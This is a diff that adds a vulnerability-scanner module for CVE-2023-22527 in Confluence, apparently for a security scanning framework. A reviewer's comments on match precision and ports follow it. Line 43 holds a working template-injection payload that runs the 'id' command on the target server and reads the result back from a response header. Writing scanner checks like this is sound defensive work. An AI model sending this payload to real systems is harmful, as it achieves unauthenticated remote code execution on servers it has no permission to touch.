1 file changed +50 -0 lines changed
1+ info :
2+ name : confluence_cve_2023_22527_vuln
3+ author : Jimmy Ly
4+ severity : 10
5+ description : A template injection vulnerability on out-of-date versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected version.
6+ reference :
7+ - https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html
8+ - https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/
9+ - https://nvd.nist.gov/vuln/detail/CVE-2023-22527
10+ profiles :
11+ - vuln
12+ - vulnerability
13+ - http
14+ - critical_severity
15+ - cve
16+ - confluence
17+ - atlassian
18+
19+ payloads :
20+ - library : http
21+ steps :
22+ - method : post
23+ timeout : 3
24+ headers :
25+ User-Agent : " {user_agent}"
26+ Accept-Encoding : gzip, deflate, br
27+ Content-Type : application/x-www-form-urlencoded
28+ allow_redirects : false
29+ ssl : false
30+ url :
31+ nettacker_fuzzer :
32+ input_format : " {{schema}}://{target}:{{ports}}/template/aui/text-inline.vm"
33+ prefix : " "
34+ suffix : " "
35+ interceptors :
36+ data :
37+ schema :
38+ - " http"
39+ - " https"
40+ ports :
41+ - 80
42+ - 443
43+ data : label=aaa%5Cu0027%2B%23request.get%28%5Cu0027.KEY_velocity.struts2.context%5Cu0027%29.internalGet%28%5Cu0027ognl%5Cu0027%29.findValue%28%23parameters.x%5B0%5D%2C%7B%7D%29%2B%5Cu0027&x=%40org.apache.struts2.ServletActionContext%40getResponse%28%29.setHeader%28%5Cu0027X-Cmd-Response%5Cu0027%2C%28new+freemarker.template.utility.Execute%28%29%29.exec%28%7B%22id%22%7D%29%29
44+ response :
45+ condition_type : and
46+ conditions :
47+ headers :
48+ X-Cmd-Response :
49+ regex : (.+)$
50+ reverse : false
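Review bot: The response condition at lines 47-49 accepts any non-empty X-Cmd-Response header (`regex : (.+)$`), so any server or intermediary that happens to set that header is reported as vulnerable. The request at line 43 runs `id`, so the match can be tied to that command's output shape, for example `uid=\d+`, which keeps the finding specific to a successful evaluation. Two smaller points: the `ports` list at lines 40-42 covers only 80 and 443, while Confluence listens on 8090 by default, so installations on the default port are missed unless the operator overrides ports; and the description at line 5 should state that the check executes a command on the target rather than fingerprinting a version, since that affects where the module is safe to run. The 3 second timeout at line 23 may also be short for a loaded instance and produce false negatives.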